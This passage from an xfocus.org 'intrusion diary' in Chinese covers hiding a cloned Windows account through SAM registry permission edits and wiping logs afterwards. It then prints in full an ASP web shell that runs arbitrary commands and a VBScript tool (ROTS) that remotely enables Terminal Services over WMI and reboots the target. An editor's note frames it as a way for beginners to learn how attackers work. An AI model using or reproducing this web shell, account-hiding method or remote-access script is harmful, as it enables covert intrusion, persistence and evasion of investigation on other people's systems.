入侵日记一则.html

里面收集的是发表在www.xfocus.org上的文章

运行regedit.exe 将我们已经修改好的3f1.reg文件导入.<br />
最后,打开regedt32.exe 找到HKEY_LOCAL_MAICHINE\SAM\SAM 点击它 ,然后在菜单&quot;安全&quot;-&gt;&quot;权限&quot; 删除刚才<br />
<br />
添加的用户(比如刚才刚才是用的guest,而且改了Administrators组的设置,所以与前面对应,Administratos<br />
<br />
组也要改,而且SAM下面的键,Domains,account,user都要逐级这样做,但如果前面没有改guest用户的默认组,<br />
<br />
这里没必要这么麻烦,一级一级的了).<br />
这样,我们就建立了一个在控制台用 net user 和&quot;计算机管理&quot;中都看不到的帐户InternetUser$,但是不能改<br />
<br />
密码,一改密码就会在&quot;计算机管理&quot;中看到.需要注意的一点是,每次登录(不论是不是克隆的),都最好注销掉,<br />
<br />
而不是直接关闭窗口,否则在&quot;终端服务管理器&quot;中会看到,而且管理员登录后注销时,可能会发现一个问题就是<br />
<br />
,怎么会是&quot;注销InternetUser$...&quot;!!! (我克隆了两个帐号,测试的,没有测试过Administrators)<br />
<br />
然后是记录清理,由于整个过程有下载的过程被记录,因此,运行logfiles,删除相关文件中的记录即可.<br />
<br />
本人水平糟糕,一定有错误和遗漏的地方,这文都改了N次,所以望高手批评指正.<br />
<br />
<br />
附录:<br />
--------------------------------------------------<br />
以下是asp后门,存为 cmd.asp<br />
&lt;%@ Language=VBScript %&gt;<br />
 &lt;%<br />
<br />
&nbsp;&nbsp; Dim oScript<br />
&nbsp;&nbsp; Dim oScriptNet<br />
&nbsp;&nbsp; Dim oFileSys, oFile<br />
&nbsp;&nbsp; Dim szCMD, szTempFile<br />
 <br />
&nbsp;&nbsp; On Error Resume Next<br />
 <br />
&nbsp;&nbsp; &#39; -- create the COM objects that we will be using -- &#39;<br />
&nbsp;&nbsp; Set oScript = Server.CreateObject(&quot;WSCRIPT.SHELL&quot;)<br />
&nbsp;&nbsp; Set oScriptNet = Server.CreateObject(&quot;WSCRIPT.NETWORK&quot;)<br />
&nbsp;&nbsp; Set oFileSys = Server.CreateObject(&quot;Scripting.FileSystemObject&quot;)<br />
 <br />
&nbsp;&nbsp; &#39; -- check for a command that we have posted -- &#39;<br />
&nbsp;&nbsp; szCMD = Request.Form(&quot;.CMD&quot;)<br />
&nbsp;&nbsp; If (szCMD &lt;&gt; &quot;&quot;) Then<br />
 <br />
&nbsp;&nbsp;&nbsp;&nbsp; &#39; -- Use a poor man&#39;s pipe ... a temp file -- &#39;<br />
&nbsp;&nbsp;&nbsp;&nbsp; szTempFile = &quot;C:\&quot; &amp; oFileSys.GetTempName( )<br />
&nbsp;&nbsp;&nbsp;&nbsp; Call oScript.Run (&quot;cmd.exe /c &quot; &amp; szCMD &amp; &quot; &gt; &quot; &amp; szTempFile, 0, True)<br />
&nbsp;&nbsp;&nbsp;&nbsp; Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)<br />
 <br />
&nbsp;&nbsp; End If<br />
 <br />
 %&gt;<br />
 &lt;HTML&gt;<br />
 &lt;BODY&gt;<br />
 &lt;FORM action=&quot;&lt;%= Request.ServerVariables(&quot;URL&quot;) %&gt;&quot; method=&quot;POST&quot;&gt;<br />
 &lt;input type=text name=&quot;.CMD&quot; size=45 value=&quot;&lt;%= szCMD %&gt;&quot;&gt;<br />
 &lt;input type=submit value=&quot;Run&quot;&gt;<br />
 &lt;/FORM&gt;<br />
 &lt;PRE&gt;<br />
<br />
 &lt;%<br />
&nbsp;&nbsp; If (IsObject(oFile)) Then<br />
&nbsp;&nbsp;&nbsp;&nbsp; &#39; -- Read the output from our command and remove the temp file -- &#39;<br />
&nbsp;&nbsp;&nbsp;&nbsp; On Error Resume Next<br />
&nbsp;&nbsp;&nbsp;&nbsp; Response.Write Server.HTMLEncode(oFile.ReadAll)<br />
&nbsp;&nbsp;&nbsp;&nbsp; oFile.Close<br />
&nbsp;&nbsp;&nbsp;&nbsp;Call oFileSys.DeleteFile(szTempFile, True)<br />
&nbsp;&nbsp;End If<br />
%&gt;<br />
&lt;/BODY&gt;<br />
&lt;/HTML&gt;<br />
<br />
----------------------------------------------------------------------<br />
以下是开终端的脚本,引自caozhe（草哲） 的&lt;&lt;一次简单的3389入侵过程 &gt;&gt;，把它存为rots.vbe<br />
on error resume next<br />
set outstreem=wscript.stdout<br />
set instreem=wscript.stdin<br />
if (lcase(right(wscript.fullname,11))=&quot;wscript.exe&quot;) then<br />
&nbsp;&nbsp; set objShell=wscript.createObject(&quot;wscript.shell&quot;)<br />
&nbsp;&nbsp; objShell.Run(&quot;cmd.exe /k cscript //nologo &quot;&amp;chr(34)&amp;wscript.scriptfullname&amp;chr(34))<br />
&nbsp;&nbsp; wscript.quit<br />
end if<br />
if wscript.arguments.count&lt;3 then<br />
&nbsp;&nbsp; usage()<br />
&nbsp;&nbsp; wscript.echo &quot;Not enough parameters.&quot;<br />
&nbsp;&nbsp; wscript.quit<br />
end if<br />
<br />
ipaddress=wscript.arguments(0)<br />
username=wscript.arguments(1)<br />
password=wscript.arguments(2)<br />
if wscript.arguments.count&gt;3 then<br />
&nbsp;&nbsp; port=wscript.arguments(3)<br />
else<br />
&nbsp;&nbsp; port=3389<br />
end if<br />
if not isnumeric(port) or port&lt;1 or port&gt;65000 then<br />
&nbsp;&nbsp; wscript.echo &quot;The number of port is error.&quot;<br />
&nbsp;&nbsp; wscript.quit<br />
end if<br />
if wscript.arguments.count&gt;4 then<br />
&nbsp;&nbsp; reboot=wscript.arguments(4)<br />
else<br />
&nbsp;&nbsp; reboot=&quot;&quot;<br />
end if<br />
<br />
usage()<br />
outstreem.write &quot;Conneting &quot;&amp;ipaddress&amp;&quot; ....&quot;<br />
set objlocator=createobject(&quot;wbemscripting.swbemlocator&quot;)<br />
set objswbemservices=objlocator.connectserver(ipaddress,&quot;root/cimv2&quot;,username,password)<br />
showerror(err.number)<br />
objswbemservices.security_.privileges.add 23,true<br />
objswbemservices.security_.privileges.add 18,true<br />
<br />
outstreem.write &quot;Checking OS type....&quot;<br />
set colinstoscaption=objswbemservices.execquery(&quot;select caption from win32_operatingsystem&quot;)<br />
for each objinstoscaption in colinstoscaption<br />
&nbsp;&nbsp; if instr(objinstoscaption.caption,&quot;Server&quot;)&gt;0 then<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;wscript.echo &quot;OK!&quot;<br />
&nbsp;&nbsp; else<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;wscript.echo &quot;OS type is &quot;&amp;objinstoscaption.caption<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;outstreem.write &quot;Do you want to cancel setup?[y/n]&quot;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;strcancel=instreem.readline<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if lcase(strcancel)&lt;&gt;&quot;n&quot; then wscript.quit<br />
&nbsp;&nbsp; end if<br />
next<br />
<br />
outstreem.write &quot;Writing into registry ....&quot;<br />
set objinstreg=objlocator.connectserver(ipaddress,&quot;root/default&quot;,username,password).get<br />
<br />
(&quot;stdregprov&quot;)<br />
HKLM=&amp;h80000002<br />
HKU=&amp;h80000003<br />
with objinstreg<br />
.createkey ,&quot;SOFTWARE\Microsoft\Windows\CurrentVersion\netcache&quot;<br />
.setdwordvalue HKLM,&quot;SOFTWARE\Microsoft\Windows\CurrentVersion\netcache&quot;,&quot;Enabled&quot;,0<br />
.createkey HKLM,&quot;SOFTWARE\Policies\Microsoft\Windows\Installer&quot;<br />
.setdwordvalue HKLM,&quot;SOFTWARE\Policies\Microsoft\Windows\Installer&quot;,&quot;EnableAdminTSRemote&quot;,1<br />
.setdwordvalue HKLM,&quot;SYSTEM\CurrentControlSet\Control\Terminal Server&quot;,&quot;TSEnabled&quot;,1<br />
.setdwordvalue HKLM,&quot;SYSTEM\CurrentControlSet\Services\TermDD&quot;,&quot;Start&quot;,2<br />
.setdwordvalue HKLM,&quot;SYSTEM\CurrentControlSet\Services\TermService&quot;,&quot;Start&quot;,2<br />
.setstringvalue HKU,&quot;.DEFAULT\Keyboard Layout\Toggle&quot;,&quot;Hotkey&quot;,&quot;1&quot;<br />
.setdwordvalue HKLM,&quot;SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-<br />
<br />
Tcp&quot;,&quot;PortNumber&quot;,port<br />
end with<br />
showerror(err.number)<br />
<br />
rebt=lcase(reboot)<br />
flag=0<br />
if rebt=&quot;/r&quot; or rebt=&quot;-r&quot; or rebt=&quot;\r&quot; then flag=2<br />
if rebt=&quot;/fr&quot; or rebt=&quot;-fr&quot; or rebt=&quot;\fr&quot; then flag=6<br />
if flag&lt;&gt;0 then<br />
&nbsp;&nbsp; outstreem.write &quot;Now, reboot target....&quot;<br />
&nbsp;&nbsp; strwqlquery=&quot;select * from win32_operatingsystem where primary=&#39;true&#39;&quot;<br />
&nbsp;&nbsp; set colinstances=objswbemservices.execquery(strwqlquery)<br />
&nbsp;&nbsp; for each objinstance in colinstances<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;objinstance.win32shutdown(flag)<br />
&nbsp;&nbsp; next<br />
&nbsp;&nbsp; showerror(err.number)<br />
else<br />
&nbsp;&nbsp; wscript.echo &quot;You need to reboot target.&quot;&amp;vbcrlf&amp;&quot;Then,&quot;<br />
end if<br />
wscript.echo &quot;You can logon terminal services on &quot;&amp;port&amp;&quot; later. Good luck!&quot;<br />
<br />
function showerror(errornumber)<br />
if errornumber Then<br />
&nbsp;&nbsp; wscript.echo &quot;Error 0x&quot;&amp;cstr(hex(err.number))&amp;&quot; .&quot;<br />
&nbsp;&nbsp; if err.description &lt;&gt; &quot;&quot; then<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;wscript.echo &quot;Error description: &quot;&amp;err.description&amp;&quot;.&quot;<br />
&nbsp;&nbsp; end if<br />
&nbsp;&nbsp; wscript.quit<br />
else<br />
&nbsp;&nbsp; wscript.echo &quot;OK!&quot;<br />
end if<br />
end function<br />
<br />
function usage()<br />
wscript.echo string(79,&quot;*&quot;)<br />
wscript.echo &quot;ROTS v1.05&quot;<br />
wscript.echo &quot;Remote Open Terminal services Script, by 草哲&quot;<br />
wscript.echo &quot;Welcome to visite <a href='http://www.5458.net&quot;' target='_blank'>www.5458.net&quot;</a><br />
wscript.echo &quot;Usage:&quot;<br />
wscript.echo &quot;cscript &quot;&amp;wscript.scriptfullname&amp;&quot; targetIP username password [port] [/r|/fr]&quot;<br />
wscript.echo &quot;port: default number is 3389.&quot;<br />
wscript.echo &quot;/r: auto reboot target.&quot;<br />
wscript.echo &quot;/fr: auto force reboot target.&quot;<br />
wscript.echo string(79,&quot;*&quot;)&amp;vbcrlf<br />
end function<br />
<br />
<br />
<span style='color:red'>root注：本文对于网络安全初学者而言，或许会有帮助，虽然采用的方法比较简单，但有助于了解攻击者的思路和方法流程，当然，不是鼓励大家这么干:)</span>
	</td>
  </tr>
</table>
<div class="footer">
  Copyright &copy; 1998-2003 XFOCUS Team. All Rights Reserved
</div>
</body>
</html>